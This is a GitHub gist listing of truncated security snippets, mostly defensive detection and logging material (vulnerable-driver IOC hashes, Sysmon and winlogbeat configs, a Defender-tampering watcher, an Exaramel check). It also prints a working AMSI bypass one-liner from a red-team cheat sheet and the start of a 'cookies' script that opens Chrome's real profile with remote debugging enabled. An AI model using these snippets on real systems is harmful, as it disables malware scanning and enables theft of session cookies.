duzvik’s gists

duzvik / ioc_vulnerable_drivers.csv

Created July 2, 2021 08:06 — forked from k4nfr3/ioc_vulnerable_drivers.csv

IOC vulnerable drivers

We can make this file beautiful and searchable if this error is corrected: It looks like row 9 should actually have 4 columns, instead of 2 in line 8.

	SHA256,Name,Signer,Description
	04A85E359525D662338CAE86C1E59B1D7AA9BD12B920E8067503723DC1E03162,ADV64DRV.sys,"""FUJITSU LIMITED """,
	05F052C64D192CF69A462A5EC16DDA0D43CA5D0245900C9FCB9201685A2E7748,Agent64.sys,"""eSupport.com, Inc.""",DriverAgent Direct I/O for 64-bit Windows
	4045AE77859B1DBF13972451972EAAF6F3C97BEA423E9E78F1C2F14330CD47CA,Agent64.sys,Phoenix Technologies Ltd,DriverAgent Direct I/O for 64-bit Windows
	6948480954137987A0BE626C24CF594390960242CD75F094CD6AAA5C2E7A54FA,Agent64.sys,Phoenix Technologies Ltd,DriverAgent Direct I/O for 64-bit Windows
	8CB62C5D41148DE416014F80BD1FD033FD4D2BD504CB05B90EEB6992A382D58F,Agent64.sys,"""eSupport.com, Inc""",DriverAgent Direct I/O for 64-bit Windows
	B1D96233235A62DBB21B8DBE2D1AE333199669F67664B107BFF1AD49B41D9414,Agent64.sys,"""eSupport.com, Inc.""",DriverAgent Direct I/O for 64-bit Windows
	7196187FB1EF8D108B380D37B2AF8EFDEB3CA1F6EEFD37B5DC114C609147216D,ALSysIO64.sys,Artur Liberman,ALSysIO
	7F375639A0DF7FE51E5518CF87C3F513C55BC117DB47D28DA8C615642EB18BFA,ALSys

duzvik / winlogbeat.yml

Last active June 16, 2021 10:47

	winlogbeat.event_logs:
	- name: Application
	ignore_older: 30m
	- name: Security
	ignore_older: 30m
	- name: System
	ignore_older: 30m
	- name: Microsoft-windows-sysmon/operational
	ignore_older: 30m
	- name: Microsoft-windows-PowerShell/Operational

duzvik / defenderwatch.ps1

Created June 7, 2021 08:10 — forked from svch0stz/defenderwatch.ps1

WMI Watcher for Windows Defender RealtimeMonitoring

	$WMI = @{
	Query = "SELECT * FROM __InstanceModificationEvent WITHIN 5 WHERE TargetInstance ISA 'MSFT_MpPreference' AND TargetInstance.DisableRealtimeMonitoring=True"
	Action = {
	#$Global:Data = $Event
	Write-Host "Defender Configuration change - DisableRealtimeMonitoring:"$Event.SourceEventArgs.NewEvent.TargetInstance.DisableRealtimeMonitoring"(Old Value:"$Event.SourceEventArgs.NewEvent.PreviousInstance.DisableRealtimeMonitoring")"
	}
	Namespace = 'root\microsoft\windows\defender'
	SourceIdentifier = "Defender.DisableRealtimeMonitoring"
	}
	$Null = Register-WMIEvent @WMI

duzvik / EventDiff.ps1

Created May 28, 2021 15:18 — forked from mgraeber-rc/EventDiff.ps1

Display only new event log events - I refer to this as event log differential analysis

	# Log the time prior to executing the action.
	# This will be used as parth of an event log XPath filter.
	$DateTimeBefore = [Xml.XmlConvert]::ToString((Get-Date).ToUniversalTime(), [System.Xml.XmlDateTimeSerializationMode]::Utc)

	# Do the thing now that you want to see potential relevant events surface...
	$null = Mount-DiskImage -ImagePath "$PWD\FeelTheBurn.iso" -StorageType ISO -Access ReadOnly

	# Allow a moment to allow events to populate
	Start-Sleep -Seconds 5

duzvik / ps-decody.py

Created May 24, 2021 09:31 — forked from Karneades/ps-decody.py

Simple python script to decode encoded PowerShell commands

	# Karneades (2019)
	# CyberChef recipe: https://gchq.github.io/CyberChef/#recipe=From_Base64('A-Za-z0-9%2B/%3D',true)Remove_null_bytes()

	import sys
	from base64 import b64encode,b64decode

	if len(sys.argv) < 2:
	print ("Usage: python3 ps-decode.py <encodedCommand>")
	sys.exit(-1)

duzvik / c.ps1

Last active March 26, 2021 12:03

cookies

	$UserData="$Env:LOCALAPPDATA\Google\Chrome\User Data"
	#Write-Host $UserData

	$DebugPort=9142
	$Chrome="C:\Program Files\Google\Chrome\Application\chrome.exe"



	#$app = Start-Process -FilePath $Chrome -ArgumentList "https://google.com --headless --user-data-dir=`"$UserData`" --remote-debugging-port=$DebugPort" -PassThru
	$app = Start-Process -FilePath $Chrome -ArgumentList "https://google.com --user-data-dir=`"$UserData`" --remote-debugging-port=$DebugPort" -PassThru

duzvik / log_nothing.xml

Created March 16, 2021 15:12 — forked from mgraeber-rc/log_nothing.xml

A sysmon configuration that defaults to logging nothing. I use this as a baseline configuration for testing purposes where I can selectively turn on log sources by changing "include" to "exclude"

	<Sysmon schemaversion="4.50">
	<HashAlgorithms>md5,sha256</HashAlgorithms>
	<EventFiltering>
	<!--Event ID 1: Process creation-->
	<ProcessCreate onmatch="include"></ProcessCreate>
	<!--Event ID 2: A process changed a file creation time-->
	<FileCreateTime onmatch="include"></FileCreateTime>
	<!--Event ID 3: Network connection-->
	<NetworkConnect onmatch="include"></NetworkConnect>
	<!--Event ID 5: Process terminated-->

duzvik / PowerShell Red Team Cheat Sheet.txt

Created February 18, 2021 15:23 — forked from reybango/PowerShell Red Team Cheat Sheet.txt

	# Pulled from https://gist.github.com/jivoi/c354eaaf3019352ce32522f916c03d70

	# Description:
	# Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing.

	# AMSI Bypass (Matt Graeber)
	Normal Version
	------------------------
	[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)

duzvik / check_Exaramel.sh

Created February 16, 2021 13:00

	#!/bin/bash

	declare -a arr=(
	"/tmp/.applocktx"
	"/tmp/.applock"
	"/usr/local/centreon/www/search.php"
	"/usr/share/centreon/www/search.php"
	"/usr/share/centreon/www/modules/Discovery/include/DB−Drop.php"
	"/usr/share/centreon/www/htmlHeader.php"
	)

duzvik / private_fork.md

Created December 28, 2020 08:47 — forked from 0xjac/private_fork.md

Create a private fork of a public repository

The repository for the assignment is public and Github does not allow the creation of private forks for public repositories.

The correct way of creating a private frok by duplicating the repo is documented here.

For this assignment the commands are:

Create a bare clone of the repository. (This is temporary and will be removed so just do it wherever.)

git clone --bare [email protected]:usi-systems/easytrace.git